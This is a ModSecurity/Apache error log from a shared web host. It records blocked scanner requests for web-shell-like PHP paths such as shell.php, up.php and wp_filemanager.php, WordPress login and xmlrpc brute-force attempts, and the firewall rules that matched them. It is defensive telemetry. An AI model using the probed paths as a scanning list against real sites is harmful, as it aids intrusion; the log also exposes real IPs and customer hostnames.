[Tue May 26 18:26:44.199728 2026] [security2:error] [pid 998632:tid 998803] [client 20.5.101.115:7837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/root.php"] [unique_id "ahWYjK1OTU2dW0MS1EmwkQAAAAw"]
[Tue May 26 18:26:44.771849 2026] [security2:error] [pid 998632:tid 998731] [remote 165.22.95.96:34904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWYjK1OTU2dW0MS1EmwmAAAKEs"]
[Tue May 26 18:26:44.789077 2026] [security2:error] [pid 998632:tid 998796] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYiq1OTU2dW0MS1EmwZAAAAAU"]
[Tue May 26 18:26:44.854683 2026] [security2:error] [pid 998632:tid 998795] [client 20.5.101.115:7814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/r.php"] [unique_id "ahWYjK1OTU2dW0MS1EmwnwAAAAQ"]
[Tue May 26 18:26:45.443349 2026] [security2:error] [pid 998632:tid 998846] [client 20.48.248.215:14063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/like.php"] [unique_id "ahWYja1OTU2dW0MS1EmwqQAAADQ"]
[Tue May 26 18:26:45.443492 2026] [security2:error] [pid 998632:tid 998846] [client 20.48.248.215:14063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/like.php"] [unique_id "ahWYja1OTU2dW0MS1EmwqQAAADQ"]
[Tue May 26 18:26:45.511023 2026] [security2:error] [pid 998632:tid 998921] [client 20.5.101.115:9356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/sid3.php"] [unique_id "ahWYja1OTU2dW0MS1EmwrAAAAHw"]
[Tue May 26 18:26:46.171340 2026] [security2:error] [pid 998632:tid 998794] [client 20.5.101.115:7835] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ss.php"] [unique_id "ahWYjq1OTU2dW0MS1EmwvQAAAAM"]
[Tue May 26 18:26:46.853776 2026] [security2:error] [pid 998632:tid 998867] [client 20.5.101.115:7821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/sts.php"] [unique_id "ahWYjq1OTU2dW0MS1Emw1gAAAEk"]
[Tue May 26 18:26:46.963534 2026] [security2:error] [pid 998632:tid 998824] [client 124.43.5.103:61619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYjq1OTU2dW0MS1Emw2gAAACA"]
[Tue May 26 18:26:46.963675 2026] [security2:error] [pid 998632:tid 998824] [client 124.43.5.103:61619] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYjq1OTU2dW0MS1Emw2gAAACA"]
[Tue May 26 18:26:47.404049 2026] [security2:error] [pid 998632:tid 998857] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYjK1OTU2dW0MS1EmwlwAAAD8"]
[Tue May 26 18:26:47.529141 2026] [security2:error] [pid 998632:tid 998823] [client 20.5.101.115:16049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/shell.php"] [unique_id "ahWYj61OTU2dW0MS1Emw4wAAAB8"]
[Tue May 26 18:26:47.697324 2026] [security2:error] [pid 998632:tid 998850] [client 20.48.248.215:34914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/we.php"] [unique_id "ahWYj61OTU2dW0MS1Emw5AAAADg"]
[Tue May 26 18:26:47.697466 2026] [security2:error] [pid 998632:tid 998850] [client 20.48.248.215:34914] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/we.php"] [unique_id "ahWYj61OTU2dW0MS1Emw5AAAADg"]
[Tue May 26 18:26:48.185933 2026] [security2:error] [pid 998632:tid 998794] [client 20.5.101.115:11685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/setup-config.php"] [unique_id "ahWYkK1OTU2dW0MS1Emw8QAAAAM"]
[Tue May 26 18:26:48.841044 2026] [security2:error] [pid 998632:tid 998841] [client 20.5.101.115:9372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/t.php"] [unique_id "ahWYkK1OTU2dW0MS1Emw_wAAAC8"]
[Tue May 26 18:26:49.038471 2026] [autoindex:error] [pid 998632:tid 998808] [client 62.60.130.227:0] AH01276: Cannot serve directory /home2/debatqhn/enattafoundation.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:26:49.222251 2026] [security2:error] [pid 998632:tid 998828] [client 20.48.248.215:31799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp.php"] [unique_id "ahWYka1OTU2dW0MS1EmxCgAAACQ"]
[Tue May 26 18:26:49.222352 2026] [security2:error] [pid 998632:tid 998828] [client 20.48.248.215:31799] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp.php"] [unique_id "ahWYka1OTU2dW0MS1EmxCgAAACQ"]
[Tue May 26 18:26:49.497930 2026] [security2:error] [pid 998632:tid 998871] [client 20.5.101.115:2100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/up.php"] [unique_id "ahWYka1OTU2dW0MS1EmxGgAAAEw"]
[Tue May 26 18:26:49.735325 2026] [security2:error] [pid 998632:tid 998796] [client 62.60.130.227:52755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/xmlrpc.php"] [unique_id "ahWYka1OTU2dW0MS1EmxHgAAAAU"]
[Tue May 26 18:26:50.063152 2026] [security2:error] [pid 998632:tid 998824] [client 62.60.130.227:49286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWYkq1OTU2dW0MS1EmxKgAAACA"]
[Tue May 26 18:26:50.156901 2026] [security2:error] [pid 998632:tid 998901] [client 20.5.101.115:9349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ultra.php"] [unique_id "ahWYkq1OTU2dW0MS1EmxKwAAAGg"]
[Tue May 26 18:26:50.203866 2026] [security2:error] [pid 998632:tid 998803] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYj61OTU2dW0MS1Emw4gAAAAw"]
[Tue May 26 18:26:50.222487 2026] [security2:error] [pid 998632:tid 998777] [remote 123.30.233.13:44242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWYkq1OTU2dW0MS1EmxKQAAdnY"]
[Tue May 26 18:26:50.384047 2026] [security2:error] [pid 998632:tid 998807] [client 62.60.130.227:62495] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWYkq1OTU2dW0MS1EmxLAAAABA"]
[Tue May 26 18:26:50.703904 2026] [security2:error] [pid 998632:tid 998828] [client 62.60.130.227:58250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWYkq1OTU2dW0MS1EmxNgAAACQ"]
[Tue May 26 18:26:50.819987 2026] [security2:error] [pid 998632:tid 998815] [client 20.5.101.115:9346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/vv.php"] [unique_id "ahWYkq1OTU2dW0MS1EmxNwAAABg"]
[Tue May 26 18:26:51.012701 2026] [security2:error] [pid 998632:tid 998916] [client 62.60.130.227:53880] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWYk61OTU2dW0MS1EmxOAAAAHc"]
[Tue May 26 18:26:51.309504 2026] [security2:error] [pid 998632:tid 998913] [client 62.60.130.227:49180] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWYk61OTU2dW0MS1EmxPwAAAHQ"]
[Tue May 26 18:26:51.475955 2026] [security2:error] [pid 998632:tid 998910] [client 20.5.101.115:16060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/V5.php"] [unique_id "ahWYk61OTU2dW0MS1EmxQwAAAHE"]
[Tue May 26 18:26:51.608298 2026] [security2:error] [pid 998632:tid 998851] [client 62.60.130.227:56936] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWYk61OTU2dW0MS1EmxRAAAADk"]
[Tue May 26 18:26:52.131280 2026] [security2:error] [pid 998632:tid 998861] [client 20.5.101.115:2973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-user.php"] [unique_id "ahWYlK1OTU2dW0MS1EmxSwAAAEM"]
[Tue May 26 18:26:52.540580 2026] [security2:error] [pid 998632:tid 998857] [client 66.146.232.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYlK1OTU2dW0MS1EmxWAAAAD8"], referer: https://www.anujtradingco.com/
[Tue May 26 18:26:52.788309 2026] [security2:error] [pid 998632:tid 998843] [client 20.5.101.115:11998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-blog.php"] [unique_id "ahWYlK1OTU2dW0MS1EmxYgAAADE"]
[Tue May 26 18:26:53.445051 2026] [security2:error] [pid 998632:tid 998898] [client 20.5.101.115:12000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp.php"] [unique_id "ahWYla1OTU2dW0MS1EmxeQAAAGU"]
[Tue May 26 18:26:53.579169 2026] [security2:error] [pid 998632:tid 998861] [client 20.48.248.215:35792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-indx.php"] [unique_id "ahWYla1OTU2dW0MS1EmxegAAAEM"]
[Tue May 26 18:26:53.579269 2026] [security2:error] [pid 998632:tid 998861] [client 20.48.248.215:35792] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-indx.php"] [unique_id "ahWYla1OTU2dW0MS1EmxegAAAEM"]
[Tue May 26 18:26:53.589001 2026] [security2:error] [pid 998632:tid 998877] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYkq1OTU2dW0MS1EmxLwAAAFI"]
[Tue May 26 18:26:54.101532 2026] [security2:error] [pid 998632:tid 998876] [client 20.5.101.115:12017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/worksec.php"] [unique_id "ahWYlq1OTU2dW0MS1EmxfAAAAFE"]
[Tue May 26 18:26:54.463339 2026] [security2:error] [pid 998632:tid 998880] [client 66.146.232.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYlq1OTU2dW0MS1EmxgQAAAFU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1271061&moderation-hash=ecde80f67ed22d15605961d0fdbaa298
[Tue May 26 18:26:54.725929 2026] [security2:error] [pid 998632:tid 998651] [remote 74.7.241.58:53732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWYlq1OTU2dW0MS1EmxhgAAZwA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:26:54.758874 2026] [security2:error] [pid 998632:tid 998830] [client 20.5.101.115:9378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-themes.php"] [unique_id "ahWYlq1OTU2dW0MS1EmxiQAAACY"]
[Tue May 26 18:26:55.414732 2026] [security2:error] [pid 998632:tid 998867] [client 20.5.101.115:16003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-signin.php"] [unique_id "ahWYl61OTU2dW0MS1EmxkAAAAEk"]
[Tue May 26 18:26:55.645043 2026] [security2:error] [pid 998632:tid 998923] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYlK1OTU2dW0MS1EmxVAAAAH4"]
[Tue May 26 18:26:56.070127 2026] [security2:error] [pid 998632:tid 998893] [client 20.5.101.115:16037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-blog-header.php"] [unique_id "ahWYmK1OTU2dW0MS1EmxqAAAAGA"]
[Tue May 26 18:26:56.737664 2026] [core:error] [pid 998632:tid 998856] [client 20.5.101.115:16018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:26:56.737685 2026] [core:error] [pid 998632:tid 998856] [client 20.5.101.115:16018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:26:57.394720 2026] [security2:error] [pid 998632:tid 998884] [client 20.5.101.115:9354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ws.php"] [unique_id "ahWYma1OTU2dW0MS1EmxuQAAAFg"]
[Tue May 26 18:26:57.602456 2026] [security2:error] [pid 998632:tid 998841] [client 124.43.5.103:62462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYma1OTU2dW0MS1EmxwAAAAC8"]
[Tue May 26 18:26:57.602556 2026] [security2:error] [pid 998632:tid 998841] [client 124.43.5.103:62462] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYma1OTU2dW0MS1EmxwAAAAC8"]
[Tue May 26 18:26:58.051832 2026] [security2:error] [pid 998632:tid 998838] [client 20.5.101.115:16020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wsa.php"] [unique_id "ahWYmq1OTU2dW0MS1EmxzAAAACw"]
[Tue May 26 18:26:58.278285 2026] [security2:error] [pid 998632:tid 998914] [client 20.48.248.215:31791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/zoo.php"] [unique_id "ahWYmq1OTU2dW0MS1Emx0AAAAHU"]
[Tue May 26 18:26:58.278396 2026] [security2:error] [pid 998632:tid 998914] [client 20.48.248.215:31791] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/zoo.php"] [unique_id "ahWYmq1OTU2dW0MS1Emx0AAAAHU"]
[Tue May 26 18:26:58.535960 2026] [security2:error] [pid 998632:tid 998837] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYl61OTU2dW0MS1EmxnAAAACs"]
[Tue May 26 18:26:58.719720 2026] [security2:error] [pid 998632:tid 998875] [client 20.5.101.115:2945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/w.php"] [unique_id "ahWYmq1OTU2dW0MS1Emx1wAAAFA"]
[Tue May 26 18:26:59.177215 2026] [security2:error] [pid 998632:tid 998820] [client 20.48.248.215:13942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-link-spm.php"] [unique_id "ahWYm61OTU2dW0MS1Emx4QAAABw"]
[Tue May 26 18:26:59.177324 2026] [security2:error] [pid 998632:tid 998820] [client 20.48.248.215:13942] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-link-spm.php"] [unique_id "ahWYm61OTU2dW0MS1Emx4QAAABw"]
[Tue May 26 18:26:59.376676 2026] [security2:error] [pid 998632:tid 998856] [client 20.5.101.115:12960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/x.php"] [unique_id "ahWYm61OTU2dW0MS1Emx6AAAAD4"]
[Tue May 26 18:26:59.501666 2026] [security2:error] [pid 998632:tid 998917] [client 20.151.112.53:9169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYm61OTU2dW0MS1Emx6gAAAHg"]
[Tue May 26 18:26:59.501840 2026] [security2:error] [pid 998632:tid 998917] [client 20.151.112.53:9169] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYm61OTU2dW0MS1Emx6gAAAHg"]
